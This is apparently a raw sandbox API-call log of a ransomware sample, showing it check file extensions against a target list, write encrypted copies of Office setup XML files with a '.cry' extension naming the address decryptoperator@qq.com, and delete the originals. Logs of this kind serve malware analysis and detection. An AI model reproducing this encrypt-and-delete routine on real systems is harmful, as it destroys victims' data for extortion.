[0039.746] lstrlenW (lpString=".dbf") returned 4 [0039.746] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.746] lstrlenW (lpString=".1cd") returned 4 [0039.746] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.746] lstrlenW (lpString=".jpg") returned 4 [0039.747] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.747] lstrlenW (lpString=".doc") returned 4 [0039.747] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString=".docx") returned 5 [0039.747] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0039.747] lstrlenW (lpString=".pdf") returned 4 [0039.747] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString=".xls") returned 4 [0039.747] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString=".xlsx") returned 5 [0039.747] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0039.747] lstrlenW (lpString=".ppt") returned 4 [0039.747] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.747] lstrlenW (lpString=".zip") returned 4 [0039.747] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.747] lstrlenW (lpString=".rar") returned 4 [0039.747] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString=".bz2") returned 4 [0039.747] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString=".7z") returned 3 [0039.747] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.747] lstrlenW (lpString=".dbf") returned 4 [0039.747] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.747] lstrlenW (lpString=".1cd") returned 4 [0039.747] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned 76 [0039.748] lstrlenW (lpString=".jpg") returned 4 [0039.748] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.748] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0039.748] lstrlenW (lpString="AccessMUI.XML") returned 13 [0039.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0039.749] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1349) returned 1 [0039.749] CloseHandle (hObject=0x17c) returned 1 [0039.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 0x20 [0039.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0039.749] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.749] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0039.753] GetLastError () returned 0x0 [0039.753] ReadFile (in: hFile=0x17c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x545, lpOverlapped=0x0) returned 1 [0039.836] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x550, lpOverlapped=0x0) returned 1 [0039.837] ReadFile (in: hFile=0x17c, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0039.837] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xee, lpOverlapped=0x0) returned 1 [0039.837] SetEndOfFile (hFile=0x1a0) returned 1 [0039.837] CloseHandle (hObject=0x1a0) returned 1 [0039.838] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.838] SetEndOfFile (hFile=0x17c) returned 1 [0039.838] CloseHandle (hObject=0x17c) returned 1 [0039.838] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0039.839] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0039.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.908] lstrlenW (lpString=".doc") returned 4 [0039.908] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.908] lstrlenW (lpString=".docx") returned 5 [0039.909] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.909] lstrlenW (lpString=".pdf") returned 4 [0039.909] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.909] lstrlenW (lpString=".xls") returned 4 [0039.909] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.909] lstrlenW (lpString=".xlsx") returned 5 [0039.909] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.909] lstrlenW (lpString=".ppt") returned 4 [0039.909] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.909] lstrlenW (lpString=".zip") returned 4 [0039.909] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.909] lstrlenW (lpString=".rar") returned 4 [0039.910] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".bz2") returned 4 [0039.910] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".7z") returned 3 [0039.910] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString=".dbf") returned 4 [0039.910] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString=".1cd") returned 4 [0039.910] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString=".jpg") returned 4 [0039.910] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString=".doc") returned 4 [0039.910] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".docx") returned 5 [0039.910] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0039.910] lstrlenW (lpString=".pdf") returned 4 [0039.910] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".xls") returned 4 [0039.910] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".xlsx") returned 5 [0039.910] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0039.910] lstrlenW (lpString=".ppt") returned 4 [0039.910] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.910] lstrlenW (lpString=".zip") returned 4 [0039.910] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0039.910] lstrlenW (lpString=".rar") returned 4 [0039.910] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".bz2") returned 4 [0039.910] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0039.910] lstrlenW (lpString=".7z") returned 3 [0039.910] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.911] lstrlenW (lpString=".dbf") returned 4 [0039.911] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.911] lstrlenW (lpString=".1cd") returned 4 [0039.911] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0039.911] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0039.911] lstrlenW (lpString=".jpg") returned 4 [0039.911] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0039.911] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0039.911] lstrlenW (lpString="SETUP.XML") returned 9 [0039.911] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.944] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=2624) returned 1 [0039.944] CloseHandle (hObject=0x1b0) returned 1 [0039.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 0x20 [0039.944] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.944] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.945] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0039.945] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0039.945] GetLastError () returned 0x0 [0039.945] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0xa40, lpOverlapped=0x0) returned 1 [0040.080] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xa50, lpOverlapped=0x0) returned 1 [0040.081] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.081] WriteFile (in: hFile=0x1b8, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.082] SetEndOfFile (hFile=0x1b8) returned 1 [0040.084] CloseHandle (hObject=0x1b8) returned 1 [0040.084] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.084] SetEndOfFile (hFile=0x1b0) returned 1 [0040.085] CloseHandle (hObject=0x1b0) returned 1 [0040.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.085] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml")) returned 1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".doc") returned 4 [0040.086] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString=".docx") returned 5 [0040.086] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.086] lstrlenW (lpString=".pdf") returned 4 [0040.086] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString=".xls") returned 4 [0040.086] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString=".xlsx") returned 5 [0040.086] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.086] lstrlenW (lpString=".ppt") returned 4 [0040.086] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".zip") returned 4 [0040.086] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.086] lstrlenW (lpString=".rar") returned 4 [0040.086] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString=".bz2") returned 4 [0040.086] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString=".7z") returned 3 [0040.086] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".dbf") returned 4 [0040.086] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".1cd") returned 4 [0040.086] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".jpg") returned 4 [0040.086] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.086] lstrlenW (lpString=".doc") returned 4 [0040.087] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString=".docx") returned 5 [0040.087] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.087] lstrlenW (lpString=".pdf") returned 4 [0040.087] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString=".xls") returned 4 [0040.087] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString=".xlsx") returned 5 [0040.087] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.087] lstrlenW (lpString=".ppt") returned 4 [0040.087] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.087] lstrlenW (lpString=".zip") returned 4 [0040.087] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.087] lstrlenW (lpString=".rar") returned 4 [0040.087] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString=".bz2") returned 4 [0040.087] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString=".7z") returned 3 [0040.087] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.087] lstrlenW (lpString=".dbf") returned 4 [0040.087] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.087] lstrlenW (lpString=".1cd") returned 4 [0040.087] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 102 [0040.087] lstrlenW (lpString=".jpg") returned 4 [0040.087] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.088] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.088] lstrlenW (lpString="GrooveMUI.XML") returned 13 [0040.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.088] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=913) returned 1 [0040.088] CloseHandle (hObject=0x1b0) returned 1 [0040.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 0x20 [0040.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0040.089] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.089] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0040.104] GetLastError () returned 0x0 [0040.104] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x391, lpOverlapped=0x0) returned 1 [0040.123] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x3a0, lpOverlapped=0x0) returned 1 [0040.124] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.124] WriteFile (in: hFile=0x1c4, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.124] SetEndOfFile (hFile=0x1c4) returned 1 [0040.124] CloseHandle (hObject=0x1c4) returned 1 [0040.125] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.125] SetEndOfFile (hFile=0x1b0) returned 1 [0040.126] CloseHandle (hObject=0x1b0) returned 1 [0040.126] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.126] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml")) returned 1 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.126] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.126] lstrlenW (lpString=".doc") returned 4 [0040.126] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.126] lstrlenW (lpString=".docx") returned 5 [0040.126] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.126] lstrlenW (lpString=".pdf") returned 4 [0040.126] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".xls") returned 4 [0040.127] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 